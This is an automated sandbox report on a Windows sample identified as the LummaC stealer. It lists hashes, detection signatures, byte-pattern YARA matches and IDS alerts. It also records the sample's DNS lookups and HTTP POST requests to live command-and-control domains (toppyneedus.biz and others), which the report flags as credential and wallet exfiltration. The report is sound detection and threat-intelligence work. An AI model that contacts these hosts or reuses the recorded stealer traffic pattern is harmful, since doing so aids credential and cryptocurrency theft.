
Windows Analysis Report
4JPKDcwtDo.exe

Overview

General Information

Sample name: 4JPKDcwtDo.exe (renamed because the original name is a hash value)
Original sample name: 5530e06db7d6818359bef99c53ebef57.exe
Analysis ID: 1599847
MD5: 5530e06db7d6818359bef99c53ebef57
SHA1: d43255e222c09a14f7e2cc205df120af573a15d2
SHA256: d878e20cbf86109866c7fbd2ab840f58eb0927c526feed708b50d97c5bb9eff8
Tags: exe, user-abuse_ch

Detection

LummaC Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Found many strings related to Crypto-Wallets (likely being stolen)
Joe Sandbox ML detected suspicious sample
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Detected potential crypto function
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Classification chart (axes: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner; scale: clean, suspicious, malicious)
  • System is w10x64
  • 4JPKDcwtDo.exe (PID: 7120 cmdline: "C:\Users\user\Desktop\4JPKDcwtDo.exe" MD5: 5530E06DB7D6818359BEF99C53EBEF57)
    • WerFault.exe (PID: 7656 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7120 -s 616 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security
00000004.00000003.1352139150.000000000074C000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000004.00000002.1650950894.0000000000678000.00000040.00000020.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown
  • 0x1718:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000004.00000002.1651366354.0000000002100000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Smokeloader_3687686f | unknown | unknown
  • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000004.00000003.1352545477.0000000000750000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Process Memory Space: 4JPKDcwtDo.exe PID: 7120 | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
No Sigma rule has matched

Suricata IDS alerts

Timestamp                        SID      Severity  Classtype                                      Source IP    Source Port  Destination IP  Destination Port  Protocol
2025-01-26T15:47:59.794618+0100  2028371  3         Unknown Traffic                                192.168.2.7  49700        172.67.149.66   443               TCP
2025-01-26T15:48:01.349618+0100  2028371  3         Unknown Traffic                                192.168.2.7  49701        172.67.149.66   443               TCP
2025-01-26T15:48:02.600271+0100  2028371  3         Unknown Traffic                                192.168.2.7  49702        172.67.149.66   443               TCP
2025-01-26T15:48:03.829022+0100  2028371  3         Unknown Traffic                                192.168.2.7  49703        172.67.149.66   443               TCP
2025-01-26T15:48:05.459225+0100  2028371  3         Unknown Traffic                                192.168.2.7  49705        172.67.149.66   443               TCP
2025-01-26T15:48:06.974006+0100  2028371  3         Unknown Traffic                                192.168.2.7  49711        172.67.149.66   443               TCP
2025-01-26T15:48:08.667496+0100  2028371  3         Unknown Traffic                                192.168.2.7  49722        172.67.149.66   443               TCP
2025-01-26T15:48:11.847642+0100  2028371  3         Unknown Traffic                                192.168.2.7  49746        172.67.149.66   443               TCP
2025-01-26T15:48:00.859158+0100  2054653  1         A Network Trojan was detected                  192.168.2.7  49700        172.67.149.66   443               TCP
2025-01-26T15:48:01.865980+0100  2054653  1         A Network Trojan was detected                  192.168.2.7  49701        172.67.149.66   443               TCP
2025-01-26T15:48:12.337047+0100  2054653  1         A Network Trojan was detected                  192.168.2.7  49746        172.67.149.66   443               TCP
2025-01-26T15:48:00.859158+0100  2049836  1         A Network Trojan was detected                  192.168.2.7  49700        172.67.149.66   443               TCP
2025-01-26T15:48:01.865980+0100  2049812  1         A Network Trojan was detected                  192.168.2.7  49701        172.67.149.66   443               TCP
2025-01-26T15:47:59.794618+0100  2059424  1         Domain Observed Used for C2 Detected           192.168.2.7  49700        172.67.149.66   443               TCP
2025-01-26T15:48:01.349618+0100  2059424  1         Domain Observed Used for C2 Detected           192.168.2.7  49701        172.67.149.66   443               TCP
2025-01-26T15:48:02.600271+0100  2059424  1         Domain Observed Used for C2 Detected           192.168.2.7  49702        172.67.149.66   443               TCP
2025-01-26T15:48:03.829022+0100  2059424  1         Domain Observed Used for C2 Detected           192.168.2.7  49703        172.67.149.66   443               TCP
2025-01-26T15:48:05.459225+0100  2059424  1         Domain Observed Used for C2 Detected           192.168.2.7  49705        172.67.149.66   443               TCP
2025-01-26T15:48:06.974006+0100  2059424  1         Domain Observed Used for C2 Detected           192.168.2.7  49711        172.67.149.66   443               TCP
2025-01-26T15:48:08.667496+0100  2059424  1         Domain Observed Used for C2 Detected           192.168.2.7  49722        172.67.149.66   443               TCP
2025-01-26T15:48:11.847642+0100  2059424  1         Domain Observed Used for C2 Detected           192.168.2.7  49746        172.67.149.66   443               TCP
2025-01-26T15:47:59.155701+0100  2059421  1         Domain Observed Used for C2 Detected           192.168.2.7  53091        1.1.1.1         53                UDP
2025-01-26T15:47:59.169214+0100  2059423  1         Domain Observed Used for C2 Detected           192.168.2.7  58904        1.1.1.1         53                UDP
2025-01-26T15:48:03.207759+0100  2048094  1         Malware Command and Control Activity Detected  192.168.2.7  49702        172.67.149.66   443               TCP


AV Detection

Source: https://toppyneedus.biz/apip | Avira URL Cloud: Label: malware
Source: https://toppyneedus.biz/_ | Avira URL Cloud: Label: malware
Source: https://toppyneedus.biz/api$ | Avira URL Cloud: Label: malware
Source: https://toppyneedus.biz/riq | Avira URL Cloud: Label: malware
Source: https://toppyneedus.biz/9 | Avira URL Cloud: Label: malware
Source: https://toppyneedus.biz/h | Avira URL Cloud: Label: malware
Source: 4JPKDcwtDo.exe | ReversingLabs: Detection: 60%
Source: 4JPKDcwtDo.exe | Virustotal: Detection: 56%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.9% probability
Source: 4JPKDcwtDo.exe | Joe Sandbox ML: detected

Compliance

Source: C:\Users\user\Desktop\4JPKDcwtDo.exe | Unpacked PE file: 4.2.4JPKDcwtDo.exe.400000.0.unpack
Source: 4JPKDcwtDo.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown | HTTPS traffic detected: 172.67.149.66:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.149.66:443 -> 192.168.2.7:49701 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.149.66:443 -> 192.168.2.7:49702 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.149.66:443 -> 192.168.2.7:49703 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.149.66:443 -> 192.168.2.7:49705 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.149.66:443 -> 192.168.2.7:49711 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.149.66:443 -> 192.168.2.7:49722 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.149.66:443 -> 192.168.2.7:49746 version: TLS 1.2

Networking

Source: Network traffic | Suricata IDS: 2059421 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (impolitewearr .biz) : 192.168.2.7:53091 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2059423 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (toppyneedus .biz) : 192.168.2.7:58904 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2059424 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) : 192.168.2.7:49700 -> 172.67.149.66:443
Source: Network traffic | Suricata IDS: 2059424 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) : 192.168.2.7:49702 -> 172.67.149.66:443
Source: Network traffic | Suricata IDS: 2059424 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) : 192.168.2.7:49722 -> 172.67.149.66:443
Source: Network traffic | Suricata IDS: 2059424 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) : 192.168.2.7:49703 -> 172.67.149.66:443
Source: Network traffic | Suricata IDS: 2059424 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) : 192.168.2.7:49746 -> 172.67.149.66:443
Source: Network traffic | Suricata IDS: 2059424 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) : 192.168.2.7:49705 -> 172.67.149.66:443
Source: Network traffic | Suricata IDS: 2059424 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) : 192.168.2.7:49701 -> 172.67.149.66:443
Source: Network traffic | Suricata IDS: 2059424 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) : 192.168.2.7:49711 -> 172.67.149.66:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49700 -> 172.67.149.66:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49700 -> 172.67.149.66:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:49702 -> 172.67.149.66:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49746 -> 172.67.149.66:443
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:49701 -> 172.67.149.66:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49701 -> 172.67.149.66:443
Source: Joe Sandbox View | IP Address: 172.67.149.66
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49700 -> 172.67.149.66:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49702 -> 172.67.149.66:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49722 -> 172.67.149.66:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49703 -> 172.67.149.66:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49701 -> 172.67.149.66:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49705 -> 172.67.149.66:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49711 -> 172.67.149.66:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49746 -> 172.67.149.66:443
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: toppyneedus.biz
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 42
    Host: toppyneedus.biz
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=8WECHI4R4Q2XC
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 12809
    Host: toppyneedus.biz
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=3W3GH7I4IB9Z3GWPK
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 15065
    Host: toppyneedus.biz
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=00T4M7OEH02
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 20354
    Host: toppyneedus.biz
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=5T15HD77S8T
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 2595
    Host: toppyneedus.biz
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=GKFMC2XGC
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 557249
    Host: toppyneedus.biz
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 77
    Host: toppyneedus.biz
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: financialfreez.click
Source: global traffic | DNS traffic detected: DNS query: impolitewearr.biz
Source: global traffic | DNS traffic detected: DNS query: toppyneedus.biz
Source: unknown | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: toppyneedus.biz
Source: 4JPKDcwtDo.exe, 00000004.00000003.1335994149.0000000002D1B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: 4JPKDcwtDo.exe, 00000004.00000003.1335994149.0000000002D1B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: 4JPKDcwtDo.exe, 00000004.00000003.1352162990.0000000000708000.00000004.00000020.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1363898461.0000000000708000.00000004.00000020.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1401075229.0000000000745000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micro
Source: 4JPKDcwtDo.exe, 00000004.00000003.1335994149.0000000002D1B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: 4JPKDcwtDo.exe, 00000004.00000003.1335994149.0000000002D1B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: 4JPKDcwtDo.exe, 00000004.00000003.1335994149.0000000002D1B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: 4JPKDcwtDo.exe, 00000004.00000003.1335994149.0000000002D1B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: 4JPKDcwtDo.exe, 00000004.00000003.1335994149.0000000002D1B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: 4JPKDcwtDo.exe, 00000004.00000003.1335994149.0000000002D1B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: 4JPKDcwtDo.exe, 00000004.00000003.1335994149.0000000002D1B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Amcache.hve.11.dr | String found in binary or memory: http://upx.sf.net
Source: 4JPKDcwtDo.exe, 00000004.00000003.1335994149.0000000002D1B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
Source: 4JPKDcwtDo.exe, 00000004.00000003.1335994149.0000000002D1B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
Source: 4JPKDcwtDo.exe, 00000004.00000003.1308401458.0000000002D33000.00000004.00000800.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1308475442.0000000002D30000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 4JPKDcwtDo.exe, 00000004.00000003.1349317494.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1349354663.0000000002CFB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.
Source: 4JPKDcwtDo.exe, 00000004.00000003.1352738637.000000000074B000.00000004.00000020.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1349317494.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1349443041.0000000002CF5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta
Source: 4JPKDcwtDo.exe, 00000004.00000003.1308401458.0000000002D33000.00000004.00000800.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1308475442.0000000002D30000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 4JPKDcwtDo.exe, 00000004.00000003.1308401458.0000000002D33000.00000004.00000800.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1308475442.0000000002D30000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 4JPKDcwtDo.exe, 00000004.00000003.1308401458.0000000002D33000.00000004.00000800.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1308475442.0000000002D30000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 4JPKDcwtDo.exe, 00000004.00000003.1349317494.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1349354663.0000000002CFB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: 4JPKDcwtDo.exe, 00000004.00000003.1352738637.000000000074B000.00000004.00000020.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1349317494.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1349443041.0000000002CF5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: 4JPKDcwtDo.exe, 00000004.00000003.1308401458.0000000002D33000.00000004.00000800.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1308475442.0000000002D30000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 4JPKDcwtDo.exe, 00000004.00000003.1308401458.0000000002D33000.00000004.00000800.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1308475442.0000000002D30000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 4JPKDcwtDo.exe, 00000004.00000003.1308401458.0000000002D33000.00000004.00000800.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1308475442.0000000002D30000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 4JPKDcwtDo.exe, 00000004.00000003.1349317494.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1349443041.0000000002CF5000.00000004.00000800.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1349354663.0000000002CFB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
Source: 4JPKDcwtDo.exe, 00000004.00000003.1337357442.0000000002F98000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: 4JPKDcwtDo.exe, 00000004.00000003.1337357442.0000000002F98000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: 4JPKDcwtDo.exe, 00000004.00000002.1651799702.0000000002CD0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://toppyneedus.biz/
Source: 4JPKDcwtDo.exe, 00000004.00000002.1651799702.0000000002CD0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://toppyneedus.biz/9
Source: 4JPKDcwtDo.exe, 00000004.00000003.1352355984.0000000002CF7000.00000004.00000800.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1349317494.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1349443041.0000000002CF5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://toppyneedus.biz/_
Source: 4JPKDcwtDo.exe, 00000004.00000003.1401175680.0000000000708000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://toppyneedus.biz/api
Source: 4JPKDcwtDo.exe, 00000004.00000002.1650981832.0000000000708000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://toppyneedus.biz/api$
Source: 4JPKDcwtDo.exe, 00000004.00000002.1650981832.00000000006CB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://toppyneedus.biz/apip
Source: 4JPKDcwtDo.exe, 00000004.00000002.1650981832.00000000006F6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://toppyneedus.biz/h
Source: 4JPKDcwtDo.exe, 00000004.00000002.1651799702.0000000002CD0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://toppyneedus.biz/pi
Source: 4JPKDcwtDo.exe, 00000004.00000002.1651799702.0000000002CD0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://toppyneedus.biz/riq
Source: 4JPKDcwtDo.exe, 00000004.00000003.1320515584.0000000002CEB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://toppyneedus.biz:443/api
Source: 4JPKDcwtDo.exe, 00000004.00000003.1352738637.000000000074B000.00000004.00000020.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1349317494.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1349443041.0000000002CF5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0
Source: 4JPKDcwtDo.exe, 00000004.00000003.1308401458.0000000002D33000.00000004.00000800.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1308475442.0000000002D30000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
Source: 4JPKDcwtDo.exe, 00000004.00000003.1308401458.0000000002D33000.00000004.00000800.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1308475442.0000000002D30000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 4JPKDcwtDo.exe, 00000004.00000003.1352738637.000000000074B000.00000004.00000020.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1349443041.0000000002CF5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.invisalign.com/?utm_source=admarke
Source: 4JPKDcwtDo.exe, 00000004.00000003.1349317494.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: 4JPKDcwtDo.exe, 00000004.00000003.1337357442.0000000002F98000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
Source: 4JPKDcwtDo.exe, 00000004.00000003.1337357442.0000000002F98000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
Source: 4JPKDcwtDo.exe, 00000004.00000003.1337357442.0000000002F98000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
Source: 4JPKDcwtDo.exe, 00000004.00000003.1337357442.0000000002F98000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: 4JPKDcwtDo.exe, 00000004.00000003.1337357442.0000000002F98000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49701
Source: unknown | HTTPS traffic detected: 172.67.149.66:443 -> 192.168.2.7:49700 version: TLS 1.2
